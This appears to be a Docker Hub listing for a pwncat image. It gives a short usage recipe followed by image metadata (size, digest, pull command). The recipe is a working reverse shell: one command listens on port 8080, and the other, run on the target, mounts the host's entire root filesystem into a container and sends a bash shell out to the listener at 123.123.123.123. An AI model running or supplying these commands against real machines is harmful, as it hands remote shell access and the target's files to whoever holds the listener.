// on host with ip adress 123.123.123.123, we will wait for connection to have a shell on remote (-l: listen, -k: re-accept new clients)
docker run -ti --rm --network=host adioss/pwncat -l 8080 -k -vv
// equivalent to: docker run -ti --rm --network=host subfuzion/netcat -vl 8080
// target (connects to ip adress '123.123.123.123')
docker run -ti --rm -v /:/mnt -w=/mnt adioss/pwncat -e '/bin/bash' 123.123.123.123 8080
See https://github.com/adioss/docker-pwncat for more info
Content type
Image
Digest
Size
63 MB
Last updated
over 6 years ago
docker pull adioss/pwncat